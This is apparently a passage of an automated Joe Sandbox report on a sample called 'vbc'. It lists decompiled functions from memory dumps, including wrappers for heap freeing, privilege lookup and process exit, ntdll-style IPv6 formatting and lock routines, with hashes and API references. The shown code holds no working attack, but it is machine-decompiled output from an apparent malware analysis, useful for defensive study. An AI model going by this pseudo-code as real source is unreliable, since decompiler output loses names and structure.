				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a62f
0x0041a637
0x0041a64d
0x0041a651

APIs

RtlFreeHeap.NTDLL(00000060,00409113,?,?,00409113,00000060,00000000,00000000,?,?,00409113,?,00000000), ref: 0041A64D

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A780 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A780(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041AF60( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a79a
0x0041a7b0
0x0041a7b4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5C2,0040D5C2,00000041,00000000,?,00409185), ref: 0041A7B0

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A652 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A688

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e817cc0e679b33e58d17afcce47a469ccb4496809d16147664a3faa912462870
Instruction ID: f4097edd8bfdf788a7289d32f53fff5c9a201f479a098bc4100019dcd6ecaf01
Opcode Fuzzy Hash: e817cc0e679b33e58d17afcce47a469ccb4496809d16147664a3faa912462870
Instruction Fuzzy Hash: C4E0C2B054D3C46ED712EB688C90EC7BFA48F06B08F19459DF4C84B202C634E566D3A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A688

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00417317 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00417317(intOrPtr* __ecx) {
				void* _t1;

				_t1 =  *__ecx();
				_push(ds);
				return _t1 + 1;
			}

0x00417317
0x0041731a
0x00417326

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51485c17b489f3608c248a7845fdb5ff7b281aedcfe6ed82c8cbee2375c352ed
Instruction ID: e3425fe385282f0430888d8fca4db5bb681d3f8174616abd4976eda0fe5f5ced
Opcode Fuzzy Hash: 51485c17b489f3608c248a7845fdb5ff7b281aedcfe6ed82c8cbee2375c352ed
Instruction Fuzzy Hash: 88B09226A064089A54150C18B8080B4F724D18313BB1023D7EC09A30104C0384150288

Uniqueness

Uniqueness Score: -1.00%

Function 008810D0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00880060 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 008801D4 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 0088010C Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00881148 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 008C13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E008C13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = L008B7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x882926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = L008B7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x889cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + L008B7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + L008B7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = L008B7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = L008B7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x008c13d5
0x008c13d9
0x008c13dc
0x008c13de
0x008c13e1
0x008c13e8
0x008c13ee
0x008ee8fd
0x00000000
0x008ee921
0x008ee921
0x008ee928
0x008ee982
0x008ee98a
0x00000000
0x008ee99a
0x008ee99e
0x008ee9a3
0x008ee9a8
0x008ee9b9
0x008ee978
0x00000000
0x008ee978
0x008ee98a
0x008ee92a
0x008ee931
0x008ee944
0x008ee944
0x008ee950
0x008ee954
0x008ee959
0x008ee95e
0x008ee963
0x008ee970
0x00000000
0x008ee975
0x008ee93b
0x008ee980
0x00000000
0x008ee980
0x008ee942
0x008ee94b
0x00000000
0x008ee94b
0x00000000
0x008ee942
0x008c13f4
0x008c13f4
0x008c13f9
0x008c13fc
0x008c13ff
0x008c1406
0x008ee9cc
0x008ee9d2
0x008ee9d2
0x008ee9cc
0x008c140c
0x008c1411
0x008c1431
0x008c143a
0x008c143c
0x008c143f
0x008c143f
0x008c1442
0x008c1447
0x008c14a8
0x008c14ac
0x008ee9e2
0x008ee9e7
0x008ee9ec
0x008eea05
0x008eea05
0x00000000
0x008c1449
0x00000000
0x008c1449
0x008c144c
0x008c1459
0x008c1462
0x008c1469
0x008c146a
0x008c1470
0x008c1473
0x008c1476
0x008c1476
0x008c1490
0x008c1495
0x008c138e
0x008c1390
0x008c1397
0x008c1398
0x008c1399
0x008c13a1
0x008c13a4
0x008c13a4
0x008c1498
0x008c149c
0x008c149f
0x008c14a2
0x00000000
0x00000000
0x008c14a4
0x00000000
0x008c14a4
0x008c1413
0x008c1415
0x008c1416
0x008c1419
0x008c141c
0x008c1422
0x008c13b7
0x008c13bc
0x008c13bf
0x008c13bf
0x008c13c2
0x008c1424
0x008c1424
0x008c1424
0x008c1427
0x008c142b
0x008c142c
0x008c142c
0x008c142c
0x00000000
0x008c141c
0x008c1411

APIs

___swprintf_l.LIBCMT ref: 008C146B
___swprintf_l.LIBCMT ref: 008C1490
___swprintf_l.LIBCMT ref: 008EE970

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 008EE9B0
ffff:, xrefs: 008EE94B
:%u.%u.%u.%u, xrefs: 008EE9F4
::%hs%u.%u.%u.%u, xrefs: 008EE967

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
Instruction ID: 0d6d8136181e595b8646191786bf4fa643aa54d88bd7356b9060577c63683265
Opcode Fuzzy Hash: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
Instruction Fuzzy Hash: 5D610571900695AACF28DF69C8C4CBEBBB6FF96304718C16DE4D6C7642D634EA40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 008C0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E008C0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009601c0;
									_push(_t144);
									_push(0);
									_t51 = L0087F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L008C4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L008D3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0090217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L008D3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									L008C3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009601c0;
												_push(_t138);
												_push(0);
												_t58 = L0087F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L008C4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L008D3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0090217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L008D3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												L008C3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E008A5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = L0087F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														L008C3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = L0087F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															L008C3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = L0087F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = L008C3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E008A5329(_t110, _t138);
																_t69 = E008A53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x008c055a
0x008c055d
0x008c0563
0x008c0566
0x008c05d8
0x008c05e2
0x008c05e5
0x00000000
0x008c05e7
0x008c05e7
0x008c05ea
0x008c05f3
0x008c05f3
0x008c0568
0x008c0568
0x008c0568
0x008c0569
0x008c0569
0x008c0569
0x008c056b
0x00000000
0x00000000
0x008e217f
0x008e2183
0x008e225b
0x008e225f
0x008e2189
0x008e218c
0x008e218f
0x008e2194
